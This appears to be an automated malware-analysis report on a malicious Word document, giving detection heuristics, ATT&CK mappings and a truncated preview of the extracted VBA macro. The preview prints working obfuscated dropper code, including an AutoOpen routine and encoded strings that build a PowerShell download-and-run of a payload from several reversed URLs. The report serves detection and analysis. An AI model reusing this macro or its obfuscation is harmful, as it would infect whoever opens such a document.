MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro utilizes a Shell() call, indicating an attempt to execute external commands, likely to download and execute a secondary payload. The ClamAV detection 'Doc.Dropper.Agent-6546480-0' further supports this dropper functionality.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6546480-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6546480-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 140903 bytes |
SHA-256: ea03eb7a0e7478727034129f1c4b6f234c6c5014f5843652666f4ad42c1a44af |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "jihwmrZ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub HZuOw(kWXsM)
bHnJu = whHShZ
XIYkii = LTPZA + CDbl(50334 - dhHBzL - dVFKh + CDbl(42597)) - 36748 - CDbl(64730)
psVQZw = mpJLM
rOIUv = 35945
End Sub
Sub zQhNvu(TZAMid)
ahfJW = VVMpzp
dqBNa = ivYKH + CDbl(40310 - KsMpzd - kRjdLZ + CDbl(74982)) - 57016 - CDbl(57522)
sNGZJ = Xnlhvd
XXoqU = 56869
XsWFk = KYBBN
RUStO = APoBL + CDbl(92125 - HPIFXi - AVjzr + CDbl(1946)) - 78701 - CDbl(96193)
zljUq = jFdal
NUVja = 35090
wBSiTv = woSCN
CzpPb = wviDbz + CDbl(94471 - mBKSQi - BQhHQ + CDbl(48140)) - 74176 - CDbl(28984)
mbNUQP = FFwVhN
qhWwSv = 56458
End Sub
Sub liFBh(HLCKj)
QAjchW = FNSNd
SqaucU = PmpiO + CDbl(30224 - WztwLB - hqztP + CDbl(91551)) - 48450 - CDbl(46617)
TRbMPR = RapMbd
AORoz = 13742
WBcRk = dAMYu
zWRnCS = QcVVo + CDbl(91883 - fwfzH - RTzPz + CDbl(91356)) - 59797 - CDbl(33367)
QNQSk = ojaOVu
qAfnVj = 40270
End Sub
Sub Autoopen()
On Error Resume Next
VPRUZj = CnHnn
LIFWL = rNEimf + CDbl(51473 - wjLZww - vwzzK + CDbl(94804)) - 29016 - CDbl(62796)
HhGdfs = RKGdTQ
fpzEcS = 54977
pKSwvjuQrtXRc (prqQJF + vzXJmBbOws + AccjR)
EZzzEI = PsSCiR
ILtmN = asPmP + CDbl(66723 - tJdBn - FaQBGX + CDbl(18995)) - 67632 - CDbl(33827)
YnlrlQ = jpSGBM
KiVoA = 12555
End Sub
Sub QPfMt(KmPDbI)
qzirjd = tMUsE
GqYBV = LjIYFi + CDbl(84210 - fzaOf - QTLEiF + CDbl(43634)) - 74007 - CDbl(42241)
vnIjm = ONisz
iaYMr = 11003
wmFMLz = iUWQMY
DcRWL = LiMjnv + CDbl(2573 - kfSNQz - Rpazi + CDbl(99569)) - 77918 - CDbl(88181)
RfYEiz = qfUdN
YZQvB = 88367
ECvalm = rYclXo
PHWzG = YciwUL + CDbl(84426 - Bhmwu - lOkzS + CDbl(84850)) - 20281 - CDbl(29911)
CiFYD = RtwuG
cUwGZ = 89151
End Sub
Sub prpmc(kAXYiO)
JKfNOn = GjnoEn
Jtlrtz = ZaNvdo + CDbl(36351 - uVUfi - Rpkrm + CDbl(11146)) - 30580 - CDbl(11014)
Bipva = mhlRo
kSSlwV = 94451
End Sub
Attribute VB_Name = "STZJhsEAzGrXU"
Sub LNots(IojOp)
jXSFo = SPliJf
hBlhi = QPOGE + CDbl(95485 - dthij - TKMjh + CDbl(88372)) - 34702 - CDbl(15087)
EldEI = KBWGFp
ISQOI = 68620
End Sub
Function vzXJmBbOws()
On Error Resume Next
YhGww = DVVEn
RLKdd = pYSsL + CDbl(45022 - VuBuQT - iAjWii + CDbl(11249)) - 91956 - CDbl(56500)
jSTsXN = pnNSLo
WjUcSB = 52574
LKflfi = TYwQw
nIiTvB = MdpRR + CDbl(94817 - oJFRsT - kDkhXi + CDbl(25779)) - 15324 - CDbl(55341)
IWNFIh = QKQahV
TiiOJ = 37508
NTHuDznEbC = UkFHd("tN%49X 7R9+7R9+7R9+7R9 7R9+7R9D7R9+7R9x96TDDx97R9+7R9 7R9+7R9+'+'7R9+7R9 c7R9+7R'+'9ilbu7R9+7R9p:7R9+7R9vn7R9+7R9eL97R9+7R9X = '+'7R9+7R9CDSL9X7R9+7R9;7R9+7R9)D7R9+7R9x9@7R9+7R9Dx97R9v39j", 75139 + 5 - 75139, 75139 + 179 - 75139)
XdtCFu = XWGEAz
vkqfb = BhCMC + CDbl(65624 - Opwzw - KksTC + CDbl(6398)) - 75708 - CDbl(967)
nKWhXD = wriiA
qbhAWX = 44779
paiaoS = BKWbJ
iuXUKv = rLZId + CDbl(97642 - DRJVsY - tRBlQ + CDbl(29709)) - 68147 - CDbl(40187)
UGwiCj = bNufp
AVzpjE = 68788
uWZJF = UkFHd("Euf9D7R9+7R9x97R9+7R9kDx7R'+'9+7R99+Dx9o7R9+7R9v7R9+7R9n7R9+7R9I7R9+mv7o5", 66247 + 6 - 66247, 66247 + 65 - 66247)
Bjkjo = ViufjW
EBfPjU = iHzsb + CDbl(29877 - fobii - fTXNCN + CDbl(10763)) - 86861 - CDbl(86608)
OwSwv = RZwjh
ulsEZ = 25135
KVXoL = fjSkXC
zYbkGk = NzwCw + CDbl(85678 - RnVkuU - iIzczh + CDbl(3343)) - 5940 - CDbl(90037)
ZMCWh = BKSbE
XUqSd = 26777
PiYvpdmWGJz = UkFHd("pv+7R9(tilp7R9+7R9S7R9+7R9.Dx7R'+'9+7R99/7R9+'+'7R9d7R9+7R9nfJyd7R9+7R9p'+'R7R9+7R9/7R9+7R9gro.o7R9+7R9tosle//:ptt7R9+7R9h@/7R9+7R9aovij/moc.bmotof/7R9+jhfl31", 81227 + 7 - 81227, 81227 + 150 - 81227)
wAdinR = bIHCw
Crcmq = jZTZbt + CDbl(76245 - kfljE - HzGvdO + CDbl(9430)) - 34752 - CDbl(73954)
DQcuKj = EcCiWd
CoAwiw = 44127
CQHVM = jDWRYV
YdnShn = KwaEh + CDbl(32543 - HVaDST - kCGrSR + CDbl(44493)) - 81719 - CDbl(42568)
djUCFO = PNPPE
CovwYi = 92661
nXYDjFzAdo = UkFHd("uO7R9tcejbo-Dx7R9+7R99+D7R9+7R9x9w7R9+7R9D7R9+7R9x7R9+7R997R9+7R9+Dx7R9+7R99e7R9+7R9n7R9+7R9Dx7R9+7R99(7R9PXrM", 52581 +
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.